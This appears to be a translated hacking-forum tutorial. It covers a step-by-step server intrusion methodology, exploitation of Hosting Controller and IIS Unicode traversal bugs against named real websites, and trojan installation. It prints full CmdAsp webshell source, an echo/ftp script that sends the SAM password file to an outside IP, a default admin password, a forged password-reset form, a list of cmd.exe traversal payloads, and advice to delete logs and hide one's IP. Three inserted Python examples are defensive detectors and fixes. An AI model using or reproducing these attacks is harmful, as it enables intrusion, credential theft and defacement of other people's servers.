
The Steps of Hacking a Server!

The steps a hacker takes when trying to break into a server system:

<Step 1> FootPrinting: The goal of this step is mainly initial information about the server. The techniques you need are: Open source search, Whois, Web interface to whois, Arin Whois, DNS zone transfer (this part mainly checks who owns the server, its DNS and so on; the server's structure is not yet clear here). Some tools: UseNet, search engines, Edgar, any Unix client, http://www.networksolutions.com/whois , http://www.arin.net/whois , dig, nslookup ls -d, Sam Spade.

<Step 2> Scanning: Most servers give up important information in this step, so try to make the most of it to learn the ports on the server and listen to the data path. Techniques: Ping Sweep, TCP/UDP port scan, OS detection. Tools: fping, icmpenum, WS_Ping ProPack, nmap, SuperScan, fscan, queso, siphon.

<Step 3> Enumeration: At this step the attacker starts to get a first grip on the server, identifying the accounts on it, the level of protection, etc. Techniques: List user accounts, List file shares, Identify applications. Supporting tools: null sessions, DumpACL, sid2user, OnSite Admin, showmount, NAT, Legion, banner grabbing with telnet, netcat, rpcinfo.

<Step 4> Gaining access: Aha, there is now enough data to put it all together. We are getting close to the target. Seize the opportunity: an account may be cracked. Techniques: Password eavesdropping, File share brute forcing, Password file grab, buffer overflows. Tools: tcpdump, L0phtcrack readsmb, NAT, legion, tftp, pwdump2 (NT), ttdb, bind, IIS .HTR/ISM.DLL.

<Step 5> Escalating privilege: If some unlucky account at some level was cracked in the step above, we now have something to use to control the server. Techniques: Password cracking, bugs, exploits. Tools: john, L0phtcrack, lc_messages, getadmin, sechole.

<Step 6> Pilfering: The information obtained in the step above is enough to locate the server and control it. If this step fails, go to step <9>. Techniques: Evaluate trusts, Search for cleartext passwords. Tools: rhosts, LSA Secrets, user data, configuration files, Registry.
<Step 7> Covering tracks: The system always records your actions. If you stopped now you would surely be caught straight away. This is an extremely important step. DELETE THE LOGS. Techniques: Clear logs, hide tools. Tools: Zap, Event Log GUI, rootkits, file streaming.

<Step 8> Creating backdoors: Needless to say, you have to leave a back door so that getting in next time is easier. If this does not succeed, go back to step <4> and re-check the privileges of the user you are using. Techniques: Create rogue user accounts, schedule batch jobs, infect startup files, plant remote control services, install monitoring mechanisms, replace apps with Trojans. Tools: members of wheel, administrators, cron, At, rc, Startup folder, registry keys, netcat, remote.exe, VNC, BO2K, keystroke loggers, add account to secadmin mail aliases, login, fpnwclnt.dll.

<Step 9> Denial of Service: An attacker who has not succeeded with what he did... will use exploit code to make the server stop working altogether; this is called a denial of service attack. Techniques: SYN flood, ICMP techniques, Identical src/dst SYN requests, Overlapping fragment/offset bugs, Out of bounds TCP options (OOB), DDoS. Supporting tools: synk4, ping of death, smurf, land, latierra, teardrop, bonk, newtear, supernuke.exe, trinoo/TFN/stacheldraht.

You can search for the tools above on search engines such as http://www.google.com

Hacking an NT server via the Hosting Controller bug:

The HC bug is a bug in the Hosting Controller software, which is used to manage servers that provide domains and hosting to customers and usually runs on Win2000/NT. I will hack via the HC bug, and as an example I will use an unpatched server holding 38 sites that Hacker Forum hacked last month.

+ The HC bug lets you run a command line that reads the server's hard drives (C; D; E), even A, through a site or directly by the server's ID. The HC bug is really a bug in 4 files of the software: statsbrowse.asp; servubrowse.asp; browsedisk.asp; browsewebalizerexe.asp; sqlbrowse.asp. I will write out the structure of the command for hacking into the server through these 4 buggy files: .................. where HC can be: admin; advadmin; hostingcontroller.

The first bug I will introduce to you is called Multiple security vulnerabilities. These are the scripts that let you browse any file on the server:
http://www.victim.com/advwebadmin/stats/st...epath=c:/&Opt=3
http://www.victim.com/advwedadmin/serv_u/s...epath=c:/&Opt=3
http://www.victim.com/advwedadmin/adminset...epath=c:/&Opt=3
http://www.victim.com/advwedadmin/adminset...epath=c:/&Opt=3

http://www.victim.com/advwedadmin/SQLServ/...epath=c:/&Opt=3

Here Victim is the server with the HC bug that you want to hack. I will give an example of hacking a server through one of the sites hosted on it (also called a local exploit hack). Example: this site was hacked by Hacker Forum: http://123hollywood.com/hf.htm . In the address bar type one of the following lines:
http://123hollywood.com/admin/stats/statsb...=c:\&Opt=3
http://123hollywood.com/admin/serv_u/servu...=c:\&Opt=3
http://123hollywood.com/admin/adminsetting...=c:\&Opt=3
http://123hollywood.com/admin/adminsetting...=c:\&Opt=3
http://123hollywood.com/admin/SQLServ/sqlb...=c:\&Opt=3

You will now get into the "Browser Directories" section. This is the whole structure of the website. Once you are inside C:\ you will see a websites folder (on this test server; on other servers it is usually on D:/). If you see it, OK. Go in and you will see a whole series of websites. On the server we are hacking above you will see the websites placed in separate folders, sorted alphabetically. Let's find the website through which we got into this server. Go to 123web/123kinh/123hollywood.com/www/. Extremely simple, isn't it. Once you know the path of the site to hack, use the following script: http://www.example.com/advwebadmin/folders...om&OpenPath=C:/ Replace example with the name of the server and testing with the name of the web page you want to hack. For example: if you register a website named cuonglong at FPT, FPT gives you a place for your web pages: c:\webspace\resadmin\cuonglong\cuonglong.com\www . To hack this page, type the script as above: http://www.ftp.com/advwebadmin/folders/fil...om&OpenPath=C:/ So now you are into the directory structure of the web site, but at this point you only have the right to upload a file from your hard drive to the site. Next you upload the file ntdaddy.asp to the website and run it there to fetch the *.mdb and *.SAM files; these are the files that hold the passwords, and you just have to decode them. With that you have hacked the website.

Now I will show you how to upload and delete files on these sites: this is also extremely simple; look at the following sample: http://www.eg.com/hc/folders/filemanager.a...om&OpenPath=C:/ where testing is the path into the website you want to upload to; OK!
Now you can play around freely; you could even make the whole site die for an hour, which is a bit much.. There are a few more HC bugs, among them one that lets you create a hosting account for yourself on the server with the following line: http://victim.com/admin/autosignup/dsp_newwebadmin.asp As above, Victim is the server with the HC bug that you want to hack. For example, the website http://bigguy.ourweb.net/ : http://bigguy.ourweb.net/AdvAdmin/autosign...newwebadmin.asp I created this one; go and have a look: http://www.hackerforum.com/ This bug allows free domain registration. Register a domain for yourself right away, then go to http://www.victim.com/AdvAmin/ and log in with the account you just registered. After logging in, click Directories on the menu and go into your domain. Then upload your web page (the upload area is at the bottom), remember the name of that page, and click logout (top right). That gets us halfway.

Next go to: http://www.victim.com/AdvAdmin/import/imp_...in.com\www Replace the word "username" with the username you registered the domain with, replace www.yourdomain.com with the domain address you registered, and press enter. For example, if I registered a domain named http://www.cuonglong.com/ with the username ncviet on the website http://bigguy.ourweb.net/ , I would type: http://bigguy.ourweb.net/AdvAdmin/import/i...onglong.com/www This is the website's Import section. It shows 4 path boxes. Now find your web page in the first box at the bottom, click it and press the "import" button. It has now copied your web page into the second box at the bottom. Ok, the hack is done. For example, if you uploaded the file cl.htm, the web path will be: http://bigguy.ourweb.net/AdvAdmin/cl.htm

Note: http://www.victim.com/ is to be replaced by the website with the HC bug. Also, during the hack the server may capture your IP, so disguise yourself carefully. You can find many servers that still have this bug by going to http://www.google.com/ and entering the keyword "Hosting Controller" for it to search.

Next is a slash dot dot bug in HC that lets us see the paths of the server's drives and folders, and we can use it to add a DSN path pointing to a new address.
To exploit this bug use the following code: http://www.target.com/admin/dsn/dsnmanager....\..\ The second is that we can completely change or add to the admin folder and execute whatever we want. To exploit this bug just enter the following code: http://www.target.com/admin/import/imp_roo...tpPath=C:\ You can take control of all the files in that folder (and possibly all of C:\) and change them as you like.. And the last bug is the default password: if the admin has not deleted or changed the user named AdvWebadmin (the default user) this is very dangerous, because we can take full (or partial) control of the server through this user's default password, "advcomm500349", after which hacking is easy.

While I'm at it, I will also show you how to install a trojan or a DoS (Denial of Service) program on a server you have got into, to serve your later hacking. Usually, when hacking through the HC bug, it is very hard to install a program directly into C:/ as with the IIS bug. But we can still install a small program that we set up through a site hosted on the server. Upload a trojan to a site of our choice (the upload method was described above). Below I will install a reaccserver, which, once installed on a server, lets us control the server from our computer at home. I upload the file reaccserver.exe to the site http://123hollywood.com/ . Now, to install this trojan on the server, type the following line: http://123hollywood.com/reaccserver.exe You may wonder how it can be installed on the server without going through the server's notification. Right: hosting management software usually notifies the server, but server administrators usually skip this when installing HC. When you type the line above, if it succeeds IE will report "server setup file full". If it fails it will say "Can't not Found". In that case type again: http://123hollywood.com/../../../reaccserver.exe which is sure to be OK. Note: when the file is set up, the program is installed on your own PC as well. Uninstall it. We have now installed the reaccserver trojan. Now use the remaining part of the program, the file cp.exe. We can shut down or restart that server. Usually a server takes at least 3 minutes to restart.

Now I will also say a little more about a bug in some websites on servers running HC: they often have upload.asp files inside the website's folders. So even if the HC bug has been fixed, we can still hack as usual. Here is an example: http://www.aten2000.com/aspupload_samples_...rmAndScript.asp See! I can upload any file I want. Now let me look at the typical structure of a website running HC. Go here: http://www.aten2000.com/cmd.asp to view the whole server with the commands dir C:\ ; dir D:\ ; dir E:\ and read files with the command type C:\..[path].. ----> Note: this command can read any file. Try looking around in there; there is plenty.
Once you are into the server, you should install an ASP file so that reading the hard drive is easy. Here is the structure of the file cmd.asp:
----------------------------------------------------------------------
<%@ Language=VBScript %>
<%
' --------------------o0o-------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' ------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
  ' -- Use a poor mans pipe ... a temp file -- '
  szTempFile = "C:\" & oFileSys.GetTempName( )
  Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
  Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
" method="POST">
------------------------------------------------------------------------------------
NTDaddy can be downloaded here: ntdaddy download

On some servers, for reasons unclear, you have to combine cmdasp and ntdaddy for it to work. For exploitation there are 2 extremely important sources of information to look at first: HC's database and the file sam._, which holds all the information about the hosts on the server. The file sam._ is really only a backup and may be incomplete; it is usually kept in winnt\repair. The complete sam is in winnt\system32\config, but it is locked and very hard to get. Once you have sam._, use l0pht or LC3 (download from http://www.l0pht.com/ or many places on the net) to crack it. As for the hosts' database, it is usually kept in HC's installation folder, e.g. c:\program files\advanced communications\NT web hosting\...., and is an Access file.

How do you download files like these!? There are a few ways. If you know where the hosts' data is stored on the server (e.g. something like d:\users\www\democoun\www, an address which when browsed in a browser would be http://www.democoun.com/ for instance; this is only an example, you have to find the specific folder yourself, which is very important), you can use the copy command to copy these files straight into that folder, then download them directly from the

browser, as www.democoun.com/sam._ . Another way is to ftp the file you want to an ftp address you know, by typing commands in cmdasp.asp or ntdaddy.asp (Khoa gave me the information on this method). However, you cannot type and run interactive ftp commands one by one with these tools; you have to create a text file containing the list of commands and ask ftp to run them. To create the text file we use the echo command; see the following example:

echo OPEN 111.214.156.105 > c:\dl.txt & vol

After entering this in cmdasp's command textbox and running it, this command creates a file c:\dl.txt containing the command "open 111.214.156.105". It is much the same for the other commands; for example the following command adds a line after the open command in dl.txt:

echo USER anonymous anyname@anon.com >> c:\dl.txt & vol

Note that from the 2nd command onward you must use ">>" instead of ">". Do the same for the remaining commands, so that the commands in dl.txt for sending a file by ftp contain at least the following:
OPEN 111.214.156.105
USER anonymous anyname@anon.com
binary
send C:\sam._ sam._
BYE

These commands send the file c:\sam._ on the server you are hacking to the anonymous address 111.214.156.105. You have now created the required ftp script file. Now use the following command to execute the commands in dl.txt. First change to the folder holding dl.txt with the command cd c:\, then enter the following in cmdasp's command box: "ftp -n -s:c:\dl.txt" and Run! If it succeeds, i.e. the browser reports no error and only shows the ftp connection information... then the file sam._ has been sent to the anonymous address above. You just ftp there and download it. Then use the L0phtCrack program to decode the SAM file. Note: once the files you copied have been downloaded, delete them to avoid detection.

To find websites with the Hosting Controller bug, go to http://www.google.com/ and type: "allinurl:/advadmin" (without the quotes) and press the Google Search button.

Friends, what I have found is nothing new; it just makes use of HC's known bugs. It is like applying theory to an exercise! :smg] After registering an account through the path http://www.victim.com/hc/autosignup/dsp_newwebadmin.asp you have the right to UPLOAD trojans and backdoors to the server. But how do you activate them? Follow these steps:
1. Find the IP address of the server machine hosting that web page.

2. Type the path to the trojan in the following form (I only know cmdasp.asp and ntdaddy.asp, so I installed those): http://Server-IP-address/resadmi....asp.asp (http://Server-IP-address/restadmin/username-you-registered/www/cmdasp.asp). Depending on the server, this path may differ slightly. You can use one of the 5 bugs for viewing the server's directory structure to know it exactly. The Server-IP-address corresponds to the WWWROOT folder on the server. At this point there are 2 possibilities:
* The server admin gives you the right to create, delete and copy files on the machine. Then OK, fetch the password files and crack them. Or do whatever you like. :smg]
* You can only use ordinary commands such as dir, net user, netstat, ... but cannot delete or copy files. What now :sad] ? Let's go to step 3. (The other day I told Admin the success rate might be around 60%, for this very reason. If you meet a careful admin who blocks writing to all the folders, then I'm stuck. Then I would have to rely on you.)
3. :shy] Luckily you can exploit it another way, by adjusting the Autoexec.bat file with the ECHO command in CMDASP.ASP. Now look for backdoors or trojans that can install themselves and hide on a WinNT server. If you don't have one, go to TLSECURITY.NET or GOOGLE.COM and search. Next upload it to your account. Then modify the contents of AUTOEXEC.BAT (in the C:\ folder) by using the ECHO command in cmdasp.asp to add a command line that is the path to the executable of the backdoor (or trojan) you uploaded. Done!! :smoking] Now you have achieved the goal of breaking into the web page, so celebrate the victory. Success or failure from here on depends on your skill and experience in hiding your tracks and hacking. Good luck!! If there are omissions (I am sure there are) please correct them for me, many thanks!! Have fun!!
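Added example, not taken from the post above: a small Python classifier a defender would run over a web root after reading about cmd.asp and ntdaddy.asp, to find ASP pages that behave like them. It looks for three things together: creation of a shell COM object, a variable assigned from Request.Form or Request.QueryString, and that variable reaching a .Run or .Exec call. The three sample sources are constructed for the example, and the regexes are a heuristic rather than a VBScript parser.

```python
import re

# Heuristic signatures (assumptions for this example, not an exhaustive list):
# a shell COM object, a variable fed from the request, and a Run/Exec call.
SHELL_OBJ_RE = re.compile(
    r'CreateObject\s*\(\s*"(?:WSCRIPT\.SHELL|Shell\.Application)"\s*\)', re.I)
INPUT_VAR_RE = re.compile(
    r'\b(\w+)\s*=\s*Request(?:\.Form|\.QueryString)?\s*\(', re.I)
EXEC_RE = re.compile(r'\.(?:Run|Exec|ShellExecute)\s*\(([^)]*)\)', re.I)


def classify_asp(source: str) -> str:
    """Return 'webshell' when request-controlled data reaches a shell call,
    'suspicious' when a shell object or exec call is present but its argument
    is fixed, and 'clean' otherwise."""
    has_shell = SHELL_OBJ_RE.search(source) is not None
    tainted = {m.group(1).lower() for m in INPUT_VAR_RE.finditer(source)}
    exec_args = EXEC_RE.findall(source)
    for args in exec_args:
        words = {w.lower() for w in re.findall(r"\w+", args)}
        if words & tainted:
            return "webshell"
    if has_shell or exec_args:
        return "suspicious"
    return "clean"


def scan_files(files: dict) -> dict:
    """Classify a mapping of file name -> ASP source text."""
    return {name: classify_asp(src) for name, src in files.items()}


# Constructed sample pages (not files from any real server).
SAMPLES = {
    # ordinary form handler: request data, but no shell object
    "contact.asp": '<% name = Request.Form("name")\n'
                   'Response.Write("Thanks " & name) %>',
    # shell object with a fixed command: worth a look, not a webshell
    "report.asp": '<% Set sh = Server.CreateObject("WSCRIPT.SHELL")\n'
                  'sh.Run("C:\\tools\\report.exe", 0, True) %>',
    # the cmd.asp pattern: request field flows into cmd.exe
    "cmd.asp": '<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")\n'
               'szCMD = Request.Form(".CMD")\n'
               'Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) %>',
}

if __name__ == "__main__":
    for name, verdict in scan_files(SAMPLES).items():
        print(f"{name}: {verdict}")
```

The taint step is deliberately crude (identifier overlap between the request assignment and the exec argument), which is enough to separate a fixed maintenance script from a page that runs whatever was posted to it; a real deployment would also walk the directory tree and log file hashes and timestamps for the hits.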
Bye
--------------------------------------------------------------------------------------------------
If Hosting Controller has not been patched you should not use this method, because its success rate is very low; in my view not even 6%, let alone 60%. These are the conditions that must hold if you want to use the method above:
- First: you must find the server's real IP. The server's real IP is the IP that points to wwwroot on drive C (by default). A server is configured with many IPs, especially a hosting server, so finding the real IP is very hard; even once you are inside the server, finding the real IP is a whole problem in itself, never mind loitering outside the server.
- Second: the resadmin web folder (the folder holding the web created under resadmin's rights, which we used the HC bug to create an account for) must be inside the wwwroot the real IP points to; for instance the resadmin web folder would have to be at C:\inetpub\wwwroot\resadmin\viethacker\viethacker.net\www . In practice this is very rarely the case, because hosts usually put the web user directory somewhere else or on another drive for safety.
- Third: if you find the real IP and the resadmin web folder is inside the wwwroot the real IP points to, you still need the condition that wwwroot is not permission-restricted for the web user, meaning the web user can access the files and subfolders of wwwroot from the real IP.
- In the rare case that all 3 conditions hold and you get into the server but have not obtained Admin rights, it is still hard to exploit because of the many restrictions on the server side, and many trojans only work when run with Admin rights, whereas here we are only in the server with the web user's rights. Find a way to get Admin rights while in the server as a web user.

The file /accounts/updateuserdesc.asp does not re-check the logged-in user on submit, so by modifying this file we can change the password of any user. How: this is for those who have created a webadmin user; anyone who has created a reseller admin will find it simpler (research that yourselves). First, save the following as the file updateuserdesc.asp on your hard drive:

updateuserdesc.asp
<!--Session Variable Names Reference-->
<!-- #include file="adovbs.inc"-->
<html>
<head>
<title>Update User Information</title>
<META HTTP-EQUIV="Expires" CONTENT="-1">
<META HTTP-EQUIV="Pragma" CONTENT="No-Cache">
<script type="text/javascript" src="http://www.yourvictim.com/admin/css/jslib.js"></script>
<link rel="stylesheet" type="text/css" href="http://www.yourvictim.com/admin/css/tbset.css">
<script language="JavaScript">
function CheckEntries(frm) {
  var flag;
  Empty = false;
  if (frm.PassCheck.checked) {
    if (frm.Pass1.value == "") {
      alert("The password or confirm password are empty");
      frm.Pass1.focus();
      return false;
    }
  }
  frm.action = "http://www.yourvictim.com/admin/accounts/AccountActions.asp?ActionType=UpdateUser&UserName=" + frm.UserName.value;
  frm.submit();
}
function GoBack(frm) {
  frm.action = "AccountManager.asp";
  frm.submit();
}
</script>
</head>
<body>
<form name="newUserForm" action="http://www.yourvictim.com/admin/accounts/AccountActions.asp?ActionType=UpdateUser" method="post" onSubmit="return CheckEntries(newUserForm)">
<center><h2>Update User Account</h2><p></center>
<center>
<table BORDER="0" align="center" CELLSPACING="1" CELLPADDING="1" width="60%" class="trhead">
<tr>
<td>Alter</td>
<td>User Information</td>
</tr>
</table>
<table align="center" class="trbody" width="60%">
<tr>
<td>User Name:</td>
<td>killuser</td>
<input type="hidden" name="UserName" value="killuser">
</tr>
<tr>
<td>Full Name:</td>
<td><input name="FullName" align="LEFT" tabindex="2" title="New Full Name" value="killuser"></td>
</tr>
<tr>
<td>Description :</td>
<td><input name="Description" align="LEFT" tabindex="3" title="Description" value=""></td>
</tr>
<tr>
<td>Change Password Also:</td>
<td><input type="checkbox" name="PassCheck" value="TRUE">&nbsp;&nbsp;&nbsp;&nbsp;
<a href="javascript:callHelp('http://www.yourvictim.com/admin/accounts/help/reseller/change_password.htm')"><img src="..\images\help.gif" border="0" value="Help"></a>
</td>
</tr>
<tr>
<td>New Password&nbsp;:&nbsp;</td>
<td><input type="password" name="Pass1" align="LEFT" tabindex="4" title="Password"></td>
</tr>
<tr>
<td>Account Disabled:</td>
<td><input type="checkbox" name="AccountDisabled" align="LEFT" tabindex="6" title="Account Disabled">&nbsp;&nbsp;&nbsp;&nbsp;
<a href="javascript:callHelp('http://www.yourvictim.com/admin/accounts/help/reseller/disable_account.htm')"><img src="..\images\help.gif" border="0" value="Help"></a>
</td>
</tr>
<tr>
<td>User Cannot Change password:</td>
<td><input type="checkbox" name="UserChangePassword" align="LEFT" tabindex="7" title="Change Password"></td>
</tr>
</table>
<input type="hidden" name="ActionType" value="AddUser" title="AddUser">
<table WIDTH="60%" ALIGN="center" CELLSPACING="1" CELLPADDING="1" class="trhead">
<tr>
<td><input type="button" class=butn name="Update" value="Update User" align="MIDDLE" tabindex="7" title="Submit" onclick="return CheckEntries(this.form)"></td>
<td><input type="button" class=butn name="Cancel" value="Back" align="MIDDLE" tabindex="7" title="Submit" onclick="return GoBack(this.form)"></td>
</tr>
</table>
</form>
</body>
</html>
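Added example, not Hosting Controller's code and not the poster's: a Python sketch of the flaw the reply describes in /accounts/updateuserdesc.asp, beside the check that closes it. The account store, the two roles and the form field names are constructed for the example. The vulnerable handler takes the target account from the submitted UserName field and never compares it with the logged-in session, so any authenticated webadmin can reset any other account; the fixed handler only proceeds when the session user is the target itself or the reseller that owns it.

```python
from dataclasses import dataclass


@dataclass
class Account:
    username: str
    role: str      # "reseller" or "webadmin" (constructed, loosely after HC's roles)
    parent: str    # reseller that owns a webadmin account; "" for a reseller
    password: str


def make_sample_accounts():
    """Constructed directory: one reseller with two customers, plus an unrelated
    webadmin account such as one registered through the signup page."""
    return {
        "bigguy":    Account("bigguy",    "reseller", "",       "r3s3ll3r"),
        "killuser":  Account("killuser",  "webadmin", "bigguy", "secret1"),
        "cuonglong": Account("cuonglong", "webadmin", "bigguy", "secret2"),
        "ncviet":    Account("ncviet",    "webadmin", "other",  "secret3"),
    }


def apply_update(target: Account, form: dict) -> bool:
    """Apply the posted form to an account (shared by both handlers)."""
    if form.get("PassCheck") == "TRUE" and form.get("Pass1"):
        target.password = form["Pass1"]
    return True


def update_user_vulnerable(accounts: dict, session_user: str, form: dict) -> bool:
    """The flaw: the target is whatever UserName the client posted, and the
    logged-in user (session_user) is never consulted."""
    target = accounts.get(form["UserName"])
    if target is None:
        return False
    return apply_update(target, form)


def may_manage(actor: Account, target: Account) -> bool:
    """Object-level authorization: self-service, or a reseller over its own customers."""
    if actor.username == target.username:
        return True
    return actor.role == "reseller" and target.parent == actor.username


def update_user_fixed(accounts: dict, session_user: str, form: dict) -> bool:
    """Same form, but the target is bound to the session identity before any change."""
    actor = accounts.get(session_user)
    target = accounts.get(form["UserName"])
    if actor is None or target is None:
        return False
    if not may_manage(actor, target):
        return False          # a real handler would also log the attempt
    return apply_update(target, form)


if __name__ == "__main__":
    form = {"UserName": "killuser", "PassCheck": "TRUE", "Pass1": "owned"}
    a = make_sample_accounts()
    print("vulnerable:", update_user_vulnerable(a, "ncviet", form), a["killuser"].password)
    a = make_sample_accounts()
    print("fixed:     ", update_user_fixed(a, "ncviet", form), a["killuser"].password)
```

The point of the fix is where the identity comes from: the form can still carry UserName for the reseller case, but the decision is made against the server-side session, never against a field the browser chose to send.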

Remember to change www.yourvictim.com and killuser (the username of the user whose password you want to change). Then go to www.yourvictim.com and log in with your webadmin account. Change the URL address to c:\your dir\updateuserdesc.asp ; HC's update-user page will appear with username = killuser, and you just check "Change Password Also", enter the new password in "New password", then Submit ==> DONE. Verify by logging in as the user "killuser". You can find user names by browsing the subfolders of HC's web root, since the folder names are the user names. Note that the password change is discovered as soon as the real user logs in, so do not abuse it.

IIS Server

Hello everyone! Today I continue by introducing another technique for hacking into an IIS server. This document is not mine; I only "picked it up" on the Internet and have already tried it out. I found it interesting and wanted to share it with you.

Step 1: You need a Unicode file in Perl form (*.pl) and a Perl interpreter.
Step 2: Once that is ready, go to DOS and type: perl unicode.pl You will see Host: (type the address of the website you want to check for being IIS) Port: type 80. ..... Wait a moment; if it is IIS it will look for bugs on the IIS. The file Unicode.pl contains about 20 bugs:
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2] /scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4] /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11] /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgibin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

Step 3: Open the browser, type the address of the web page and paste in the bug that Unicode detected. Example: I type perl unicode.pl Host: http://www.tnh.com.vn Port: 80 After it scans, this host turns out to have 2 bugs, 14 and 18. I can use either of them; say I use bug 18. I open the browser and in the address bar type: http://www.tnh.com.vn/_vti_bin/..%c0%af..%...m32/cmd.exe?/c+ And with that you have broken into the IIS. You can access the IIS machine's hard drive as if it were your own. You can create, delete and move folders and files, upload, download and run files on that server... To do so you only need DOS commands. Don't tell me you don't know DOS commands. Example: to read drive C you type dir+c:\ , which corresponds to the following line in the browser: http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\ Likewise there are commands such as md, rd, ren... Just re-read a DOS book and you're set.

P/S: The web pages are usually in inetpub\wwwroot . You only need to go there and replace its index.html with your own index.html. That's it! That website has been hacked. Remember to use programs to hide your IP to stay safe, or you'll end up behind bars. Below are some websites that use IIS:
http://www.psv.com.vn/
http://www.tnh.com.vn/
http://www.mekonggreen.com.vn
http://www.thaiweb.co.th/
http://www.khaitri.com.vn/
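Added example, not part of the post and not the unicode.pl script it describes: a Python log checker that shows why the request paths listed above worked and how a defender spots them in IIS logs. It percent-decodes each request path to bytes and then decodes those bytes twice, once with a strict UTF-8 decoder and once with a deliberately lenient decoder that accepts overlong sequences the way the vulnerable IIS versions did (so %c0%af becomes "/" and %c1%9c becomes "\"). A request is flagged when the two decoders disagree or when the lenient result contains a ".." path segment. The log lines and IP addresses are constructed for the example.

```python
from urllib.parse import unquote_to_bytes

# Constructed IIS-style log lines: date time client-ip method uri-stem uri-query status.
# Not from any real server; the traversal requests mirror the patterns in the list above.
SAMPLE_LOG = """\
2001-05-01 10:00:01 10.0.0.5 GET /index.html - 200
2001-05-01 10:00:07 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2001-05-01 10:00:09 10.0.0.9 GET /_vti_bin/..%c1%9c..%c1%9c../winnt/system32/cmd.exe /c+dir 200
2001-05-01 10:01:00 10.0.0.7 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404
2001-05-01 10:02:00 10.0.0.8 GET /images/logo.gif - 200
"""


def decode_strict(raw: bytes):
    """Canonical UTF-8 decode; None for overlong or malformed input."""
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def decode_lenient(raw: bytes) -> str:
    """Decode the way the vulnerable IIS versions did: the lead byte fixes the
    sequence length and the value is assembled without checking that the
    shortest encoding was used, so C0 AF yields '/' and C1 9C yields '\\'."""
    out, i, n = [], 0, len(raw)
    while i < n:
        b = raw[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        if b & 0xE0 == 0xC0:
            length, value = 2, b & 0x1F
        elif b & 0xF0 == 0xE0:
            length, value = 3, b & 0x0F
        elif b & 0xF8 == 0xF0:
            length, value = 4, b & 0x07
        elif b & 0xFC == 0xF8:
            length, value = 5, b & 0x03
        elif b & 0xFE == 0xFC:
            length, value = 6, b & 0x01
        else:                      # stray continuation byte
            out.append("\ufffd")
            i += 1
            continue
        tail = raw[i + 1:i + length]
        if len(tail) != length - 1 or any(c & 0xC0 != 0x80 for c in tail):
            out.append("\ufffd")
            i += 1
            continue
        for c in tail:
            value = (value << 6) | (c & 0x3F)
        out.append(chr(value) if value < 0x110000 else "\ufffd")
        i += length
    return "".join(out)


def has_dotdot(path: str) -> bool:
    """True if any segment is '..', treating '\\' and '/' alike as IIS does."""
    return any(seg == ".." for seg in path.replace("\\", "/").split("/"))


def analyse_path(stem: str):
    """Return (decoded_path, reasons); an empty reasons list means it looks clean."""
    raw = unquote_to_bytes(stem)
    lenient = decode_lenient(raw)
    reasons = []
    if decode_strict(raw) is None:
        reasons.append("non-canonical UTF-8 in percent-encoding")
    if has_dotdot(lenient):
        reasons.append("parent-directory traversal after decoding")
    return lenient, reasons


def scan_log(text: str):
    """Return (line_no, client_ip, decoded_path, reasons) for each suspicious line."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        fields = line.split()
        if len(fields) < 7:
            continue
        client_ip, stem = fields[2], fields[4]
        decoded, reasons = analyse_path(stem)
        if reasons:
            hits.append((line_no, client_ip, decoded, reasons))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Two things fall out of running it: the plain %2f line is caught only by the traversal check (its encoding is canonical, the server simply must not honour ".." after decoding), while the %c0%af and %c1%9c lines are caught by both, which is why a canonicaliser that rejects non-shortest-form UTF-8 before touching the filesystem closes the whole family at once.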

